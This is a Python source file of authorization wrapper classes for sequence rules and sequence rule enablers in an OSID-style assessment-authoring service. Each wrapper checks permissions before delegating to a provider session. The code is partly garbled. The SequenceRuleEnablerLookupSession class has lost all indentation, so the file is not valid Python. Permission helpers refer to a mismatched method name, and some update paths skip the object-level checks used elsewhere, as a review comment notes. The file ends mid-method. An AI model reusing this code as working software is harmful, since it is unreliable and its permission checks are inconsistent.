class SequenceRuleSearchSession(abc_assessment_authoring_sessions.SequenceRuleSearchSession, SequenceRuleQuerySession):
    """Adapts underlying SequenceRuleSearchSession methods with authorization checks."""

    def get_sequence_rule_search(self):
        """Pass through to provider SequenceRuleSearchSession.get_sequence_rule_search"""
        # Implemented from azosid template for -
        # osid.resource.ResourceSearchSession.get_resource_search_template
        if self._can('search'):
            return self._provider_session.get_sequence_rule_search()
        raise PermissionDenied()

    sequence_rule_search = property(fget=get_sequence_rule_search)

    def get_sequence_rule_search_order(self):
        """Search orders are not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_search_order = property(fget=get_sequence_rule_search_order)

    @raise_null_argument
    def get_sequence_rules_by_search(self, sequence_rule_query, sequence_rule_search):
        """Pass through to provider SequenceRuleSearchSession.get_sequence_rules_by_search"""
        # Implemented from azosid template for -
        # osid.resource.ResourceSearchSession.get_resources_by_search_template
        if self._can('search'):
            return self._provider_session.get_sequence_rules_by_search(sequence_rule_query, sequence_rule_search)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_query_from_inspector(self, sequence_rule_query_inspector):
        """Query inspectors are not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleAdminSession(abc_assessment_authoring_sessions.SequenceRuleAdminSession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleAdminSession methods with authorization checks."""
    def __init__(self, provider_manager, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.SequenceRule'
        self._overriding_bank_ids = None
        # Best effort: obtain a catalog session so object-level authz checks
        # can resolve which bank(s) a given sequence rule belongs to.
        if self._proxy is not None:
            try:
                self._object_catalog_session = provider_manager.get_sequence_rule_bank_session(self._proxy)
            except (Unimplemented, AttributeError):
                pass
        else:
            try:
                self._object_catalog_session = provider_manager.get_sequence_rule_bank_session()
                self.get_bank_ids_by_sequence_rule = self._object_catalog_session.get_bank_ids_by_sequence_rule
            except (Unimplemented, AttributeError):
                # Fall back to catalog-level checks only.
                pass
    def _get_overriding_bank_ids(self):
        # Lazily fetch and cache bank ids with overriding 'lookup' authorization.
        if self._overriding_bank_ids is None:
            self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
        return self._overriding_bank_ids
    def _can_for_sequence_rule(self, func_name, sequence_rule_id):
        """Checks if agent can perform function for object"""
        return self._can_for_object(func_name, sequence_rule_id, 'get_bank_ids_for_sequence_rule')
    def get_bank_id(self):
        """Return the ``Id`` of the ``Bank`` associated with this session."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the ``Bank`` associated with this session, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        else:
            return self._provider_session.get_bank()
    bank = property(fget=get_bank)
    def can_create_sequence_rule(self):
        """Test whether this agent may create sequence rules."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_create_resources
        return self._can('create')
    @raise_null_argument
    def can_create_sequence_rule_with_record_types(self, sequence_rule_record_types):
        """Test whether this agent may create a rule with the given record types."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_create_resource_with_record_types
        # This would like to be a real implementation someday:
        if sequence_rule_record_types is None:
            raise NullArgument()  # Just 'cause the spec says to :)
        return self._can('create')
    @raise_null_argument
    def get_sequence_rule_form_for_create(self, assessment_part_id, next_assessment_part_id, sequence_rule_record_types):
        """Get a creation form for a rule between the given parts, if authorized."""
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.get_sequence_rule_form_for_create(assessment_part_id,
                                                                        next_assessment_part_id,
                                                                        sequence_rule_record_types)
    @raise_null_argument
    def create_sequence_rule(self, sequence_rule_form):
        """Create a new ``SequenceRule`` from the given form, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.create_resource
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.create_sequence_rule(sequence_rule_form)
    def can_update_sequence_rules(self):
        """Test whether this agent may update sequence rules."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_update_resources
        return (self._can('update') or
                bool(self._get_overriding_catalog_ids('update')))
    @raise_null_argument
    def get_sequence_rule_form_for_update(self, sequence_rule_id):
        """Get an update form for the given rule, if authorized for that object."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.get_resource_form_for_update
        if not self._can_for_sequence_rule('update', sequence_rule_id):
            raise PermissionDenied()
        return self._provider_session.get_sequence_rule_form_for_update(sequence_rule_id)
    def duplicate_sequence_rule(self, sequence_rule_id):
        # Duplicate the given rule, if authorized.
        # NOTE(review): unlike the other mutators this uses the catalog-level
        # 'update' check, not _can_for_sequence_rule — confirm intentional.
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.duplicate_sequence_rule(sequence_rule_id)
    @raise_null_argument
    def update_sequence_rule(self, sequence_rule_form):
        """Update an existing ``SequenceRule`` from the given form, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.update_resource
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.update_sequence_rule(sequence_rule_form)
    def can_delete_sequence_rules(self):
        """Test whether this agent may delete sequence rules."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_delete_resources
        return (self._can('delete') or
                bool(self._get_overriding_catalog_ids('delete')))
    @raise_null_argument
    def delete_sequence_rule(self, sequence_rule_id):
        """Delete the given ``SequenceRule``, if authorized for that object."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.delete_resource
        if not self._can_for_sequence_rule('delete', sequence_rule_id):
            raise PermissionDenied()
        return self._provider_session.delete_sequence_rule(sequence_rule_id)
    def can_manage_sequence_rule_aliases(self):
        """Test whether this agent may manage sequence rule aliases."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_manage_resource_aliases
        return (self._can('manage') or
                bool(self._get_overriding_catalog_ids('manage')))
    @raise_null_argument
    def alias_sequence_rule(self, sequence_rule_id, alias_id):
        """Alias the given rule under ``alias_id``, if authorized for that object."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.alias_resources
        if not self._can_for_sequence_rule('alias', sequence_rule_id):
            raise PermissionDenied()
        return self._provider_session.alias_sequence_rule(sequence_rule_id, alias_id)
    def can_sequence_sequence_rules(self):
        """Rule ordering is not supported by this adapter."""
        raise Unimplemented()
    @raise_null_argument
    def move_sequence_rule_ahead(self, sequence_rule_id, assessment_part_id, reference_id):
        """Rule ordering is not supported by this adapter."""
        raise Unimplemented()
    @raise_null_argument
    def move_sequence_rule_behind(self, sequence_rule_id, assessment_part_id, reference_id):
        """Rule ordering is not supported by this adapter."""
        raise Unimplemented()
    @raise_null_argument
    def order_sequence_rules(self, sequence_rule_ids, assessment_part_id):
        """Rule ordering is not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleNotificationSession(abc_assessment_authoring_sessions.SequenceRuleNotificationSession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleNotificationSession methods with authorization checks."""

    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.SequenceRule'

    def get_bank_id(self):
        """Return the ``Id`` of the ``Bank`` associated with this session."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the ``Bank`` associated with this session, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        return self._provider_session.get_bank()

    bank = property(fget=get_bank)

    def can_register_for_sequence_rule_notifications(self):
        """Test whether this agent may register for rule notifications."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.can_register_for_resource_notifications
        return self._can('register')

    def use_federated_bank_view(self):
        """Federate the view: include sequence rules from descendant banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        """Isolate the view: restrict to this session's bank only."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    # NOTE: the original class defined reliable_/unreliable_/acknowledge_
    # twice (identical bodies); the redundant trailing copies were removed.
    def reliable_sequence_rule_notifications(self):
        """Pass through: require acknowledgement of notifications."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        self._provider_session.reliable_sequence_rule_notifications()

    def unreliable_sequence_rule_notifications(self):
        """Pass through: no acknowledgement of notifications required."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        self._provider_session.unreliable_sequence_rule_notifications()

    @raise_null_argument
    def acknowledge_sequence_rule_notification(self, notification_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    def register_for_new_sequence_rules(self):
        """Register for notifications of new sequence rules, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_new_sequence_rules()

    @raise_null_argument
    def register_for_new_sequence_rules_for_assessment_part(self, assessment_part_id):
        """Register for new rules for the given assessment part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        if not self._can('register'):
            raise PermissionDenied()
        # Fix: the original dropped assessment_part_id when delegating.
        self._provider_session.register_for_new_sequence_rules_for_assessment_part(assessment_part_id)

    @raise_null_argument
    def register_for_new_sequence_rules_for_next_assessment_part(self, assessment_part_id):
        """Register for new rules targeting the given part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        if not self._can('register'):
            raise PermissionDenied()
        # Fix: the original dropped assessment_part_id when delegating.
        self._provider_session.register_for_new_sequence_rules_for_next_assessment_part(assessment_part_id)

    def register_for_changed_sequence_rules(self):
        """Register for notifications of changed sequence rules, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rules()

    @raise_null_argument
    def register_for_changed_sequence_rules_for_assessment_part(self, assessment_part_id):
        """Register for changed rules for the given part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rules_for_assessment_part(assessment_part_id)

    @raise_null_argument
    def register_for_changed_sequence_rules_for_next_assessment_part(self, assessment_part_id):
        """Register for changed rules targeting the given part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rules_for_next_assessment_part(assessment_part_id)

    @raise_null_argument
    def register_for_changed_sequence_rule(self, sequence_rule_id):
        """Register for changes to the given sequence rule, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rule(sequence_rule_id)

    def register_for_deleted_sequence_rules(self):
        """Register for notifications of deleted sequence rules, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rules()

    @raise_null_argument
    def register_for_deleted_sequence_rules_for_assessment_part(self, assessment_part_id):
        """Register for deleted rules for the given part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rules_for_assessment_part(assessment_part_id)

    @raise_null_argument
    def register_for_deleted_sequence_rules_for_next_assessment_part(self, assessment_part_id):
        """Register for deleted rules targeting the given part, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rules_for_next_assessment_part(assessment_part_id)

    @raise_null_argument
    def register_for_deleted_sequence_rule(self, sequence_rule_id):
        """Register for deletion of the given sequence rule, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rule(sequence_rule_id)
class SequenceRuleBankSession(abc_assessment_authoring_sessions.SequenceRuleBankSession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleBankSession methods with authorization checks."""

    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # This could be better:
        self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU')
        self._id_namespace = 'assessment_authoring.SequenceRuleBank'

    def can_lookup_sequence_rule_bank_mappings(self):
        """Test whether this agent may look up rule/bank mappings."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
        return self._can('lookup')

    def use_comparative_sequence_rule_bank_view(self):
        """Relax view constraints for bank returns."""
        # Implemented from azosid template for -
        # osid.resource.BinLookupSession.use_comparative_bin_view_template
        self._provider_session.use_comparative_sequence_rule_bank_view()

    def use_plenary_sequence_rule_bank_view(self):
        """Require complete views for bank returns."""
        # Implemented from azosid template for -
        # osid.resource.BinLookupSession.use_plenary_bin_view_template
        self._provider_session.use_plenary_sequence_rule_bank_view()

    @raise_null_argument
    def get_sequence_rule_ids_by_bank(self, bank_id):
        """Get the ids of rules mapped to the given bank, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resource_ids_by_bin
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_ids_by_bank(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rules_by_bank(self, bank_id):
        """Get the rules mapped to the given bank, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resources_by_bin_template
        if self._can('lookup'):
            return self._provider_session.get_sequence_rules_by_bank(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_ids_by_banks(self, bank_ids):
        """Get the ids of rules mapped to any of the given banks, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resource_ids_by_bins
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_ids_by_banks(bank_ids)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rules_by_banks(self, bank_ids):
        """Get the rules mapped to any of the given banks, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resources_by_bins
        if self._can('lookup'):
            return self._provider_session.get_sequence_rules_by_banks(bank_ids)
        raise PermissionDenied()

    @raise_null_argument
    def get_bank_ids_by_sequence_rule(self, sequence_rule_id):
        """Get the ids of banks mapped to the given rule, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_bin_ids_by_resource
        if self._can('lookup'):
            return self._provider_session.get_bank_ids_by_sequence_rule(sequence_rule_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_banks_by_sequence_rule(self, sequence_rule_id):
        """Get the banks mapped to the given rule, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_bins_by_resource
        if self._can('lookup'):
            return self._provider_session.get_banks_by_sequence_rule(sequence_rule_id)
        raise PermissionDenied()
class SequenceRuleBankAssignmentSession(abc_assessment_authoring_sessions.SequenceRuleBankAssignmentSession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleBankAssignmentSession methods with authorization checks."""

    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # This could be better:
        self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU')
        self._id_namespace = 'assessment_authoring.SequenceRuleBank'

    def can_assign_sequence_rules(self):
        """Test whether this agent may assign rules to banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.can_assign_resources
        return self._can('assign')

    @raise_null_argument
    def can_assign_sequence_rules_to_bank(self, bank_id):
        """Test whether this agent may assign rules to the given bank."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
        return self._can('assign', qualifier_id=bank_id)

    @raise_null_argument
    def get_assignable_bank_ids(self, bank_id):
        """Get ids of banks rules may be assigned to, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_assignable_bank_ids_for_sequence_rule(self, bank_id, sequence_rule_id):
        """Get ids of banks the given rule may be assigned to, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids_for_sequence_rule(bank_id, sequence_rule_id)
        raise PermissionDenied()

    @raise_null_argument
    def assign_sequence_rule_to_bank(self, sequence_rule_id, bank_id):
        """Map the given rule to the given bank, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
        if self._can('assign'):
            return self._provider_session.assign_sequence_rule_to_bank(sequence_rule_id, bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def unassign_sequence_rule_from_bank(self, sequence_rule_id, bank_id):
        """Remove the mapping of the given rule to the given bank, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
        if self._can('assign'):
            return self._provider_session.unassign_sequence_rule_from_bank(sequence_rule_id, bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def reassign_sequence_rule_to_bank(self, sequence_rule_id, from_bank_id, to_bank_id):
        """Not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleSmartBankSession(abc_assessment_authoring_sessions.SequenceRuleSmartBankSession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleSmartBankSession methods with authorization checks."""

    def get_bank_id(self):
        """Return the ``Id`` of the ``Bank`` associated with this session."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        provider = self._provider_session
        return provider.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the ``Bank`` associated with this session, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_manage_smart_banks(self):
        """Smart bank management is not supported by this adapter."""
        raise Unimplemented()

    def get_sequence_rule_query(self):
        """Smart bank queries are not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_query = property(fget=get_sequence_rule_query)

    def get_sequence_rule_search_order(self):
        """Smart bank search orders are not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_search_order = property(fget=get_sequence_rule_search_order)

    @raise_null_argument
    def apply_sequence_rule_query(self, sequence_rule_query):
        """Not supported by this adapter."""
        raise Unimplemented()

    def inspect_sequence_rule_query(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def apply_sequence_rule_sequencing(self, sequence_rule_search_order):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def get_sequence_rule_query_from_inspector(self, sequence_rule_query_inspector):
        """Not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleEnablerLookupSession(abc_assessment_authoring_sessions.SequenceRuleEnablerLookupSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerLookupSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_lookup_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return (self._can('lookup') or
bool(self._get_overriding_catalog_ids('lookup')))
    def use_comparative_sequence_rule_enabler_view(self):
        """Set this session (and the provider) to a comparative object view."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_comparative_resource_view_template
        self._use_comparative_object_view()
        self._provider_session.use_comparative_sequence_rule_enabler_view()
    def use_plenary_sequence_rule_enabler_view(self):
        """Set this session (and the provider) to a plenary object view."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_plenary_resource_view_template
        self._use_plenary_object_view()
        self._provider_session.use_plenary_sequence_rule_enabler_view()
    def use_federated_bank_view(self):
        """Federate the view: include enablers from descendant banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            # Keep the fallback query session's view in sync with this session.
            self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def use_active_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_active_composition_view
return self._provider_session.use_active_sequence_rule_enabler_view()
def use_any_status_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_any_status_composition_view
return self._provider_session.use_any_status_sequence_rule_enabler_view()
@raise_null_argument
def get_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resource_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enabler(sequence_rule_enabler_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_id(sequence_rule_enabler_id, match=True)
results = self._try_harder(query)
if results.available():
return results.next()
raise NotFound()
@raise_null_argument
def get_sequence_rule_enablers_by_ids(self, sequence_rule_enabler_ids):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_ids_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_ids(sequence_rule_enabler_ids)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
for sequence_rule_enabler_id in (sequence_rule_enabler_ids):
query.match_id(sequence_rule_enabler_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_genus_type(self, sequence_rule_enabler_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_genus_type(sequence_rule_enabler_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_genus_type(sequence_rule_enabler_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_parent_genus_type(self, sequence_rule_enabler_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_parent_genus_type(sequence_rule_enabler_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_parent_genus_type(sequence_rule_enabler_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_record_type(self, sequence_rule_enabler_record_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_record_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_record_type(sequence_rule_enabler_record_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_record_type(sequence_rule_enabler_record_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_on_date(self, from_, to):
raise Unimplemented()
@raise_null_argument
def get_sequence_rule_enablers_on_date_with_agent(self, agent_id, from_, to):
raise Unimplemented()
def get_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers()
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_any(match=True)
return self._try_harder(query)
sequence_rule_enablers = property(fget=get_sequence_rule_enablers)
class SequenceRuleEnablerQuerySession(abc_assessment_authoring_sessions.SequenceRuleEnablerQuerySession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerQuerySession."""

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_search_sequence_rule_enablers(self):
        """True when search is authorized here or in an overriding catalog."""
        return self._can('search') or bool(self._get_overriding_catalog_ids('search'))

    def use_federated_bank_view(self):
        """Propagate the federated view to the provider and any query session."""
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        """Propagate the isolated view to the provider and any query session."""
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    def get_sequence_rule_enabler_query(self):
        """Return a wrapped query; denied only when unauthorized AND isolated."""
        if self._can('search') or not self._is_isolated_catalog_view():
            return self.SequenceRuleEnablerQueryWrapper(self._provider_session.get_sequence_rule_enabler_query())
        raise PermissionDenied()

    sequence_rule_enabler_query = property(fget=get_sequence_rule_enabler_query)

    @raise_null_argument
    def get_sequence_rule_enablers_by_query(self, sequence_rule_enabler_query):
        """Run a query, applying per-bank authorization to catalog match terms."""
        if not hasattr(sequence_rule_enabler_query, '_cat_id_args_list'):
            raise Unsupported('sequence_rule_enabler_query not from this session')
        # Only re-apply bank match terms the caller is authorized to search.
        for match_args in sequence_rule_enabler_query._cat_id_args_list:
            if self._can('search', match_args['bank_id']):
                sequence_rule_enabler_query._provider_query.match_bank_id(**match_args)
        if self._can('search'):
            return self._provider_session.get_sequence_rule_enablers_by_query(sequence_rule_enabler_query)
        self._check_search_conditions()
        matches = self._try_harder(sequence_rule_enabler_query)
        sequence_rule_enabler_query._provider_query.clear_bank_terms()
        return matches
class SequenceRuleEnablerSearchSession(abc_assessment_authoring_sessions.SequenceRuleEnablerSearchSession, SequenceRuleEnablerQuerySession):
    """Authorization wrapper around the provider's SequenceRuleEnablerSearchSession."""

    def get_sequence_rule_enabler_search(self):
        """Return the provider's search object if 'search' is authorized."""
        if self._can('search'):
            return self._provider_session.get_sequence_rule_enabler_search()
        raise PermissionDenied()

    sequence_rule_enabler_search = property(fget=get_sequence_rule_enabler_search)

    def get_sequence_rule_enabler_search_order(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_enabler_search_order = property(fget=get_sequence_rule_enabler_search_order)

    @raise_null_argument
    def get_sequence_rule_enablers_by_search(self, sequence_rule_enabler_query, sequence_rule_enabler_search):
        """Delegate a query+search to the provider if 'search' is authorized."""
        if self._can('search'):
            return self._provider_session.get_sequence_rule_enablers_by_search(sequence_rule_enabler_query, sequence_rule_enabler_search)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_enabler_query_from_inspector(self, sequence_rule_enabler_query_inspector):
        """Not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleEnablerAdminSession(abc_assessment_authoring_sessions.SequenceRuleEnablerAdminSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerAdminSession."""

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_create_sequence_rule_enabler(self):
        """True when the caller holds 'create' authorization."""
        return self._can('create')

    @raise_null_argument
    def can_create_sequence_rule_enabler_with_record_types(self, sequence_rule_enabler_record_types):
        """True when 'create' is authorized; record types are not yet consulted."""
        # The OSID spec mandates NullArgument on a None record-type list.
        if sequence_rule_enabler_record_types is None:
            raise NullArgument()
        return self._can('create')

    @raise_null_argument
    def get_sequence_rule_enabler_form_for_create(self, sequence_rule_enabler_record_types):
        """Return a create form if 'create' is authorized."""
        if self._can('create'):
            return self._provider_session.get_sequence_rule_enabler_form_for_create(sequence_rule_enabler_record_types)
        raise PermissionDenied()

    @raise_null_argument
    def create_sequence_rule_enabler(self, sequence_rule_enabler_form):
        """Create an enabler if 'create' is authorized."""
        if self._can('create'):
            return self._provider_session.create_sequence_rule_enabler(sequence_rule_enabler_form)
        raise PermissionDenied()

    def can_update_sequence_rule_enablers(self):
        """True when update is authorized here or in an overriding catalog."""
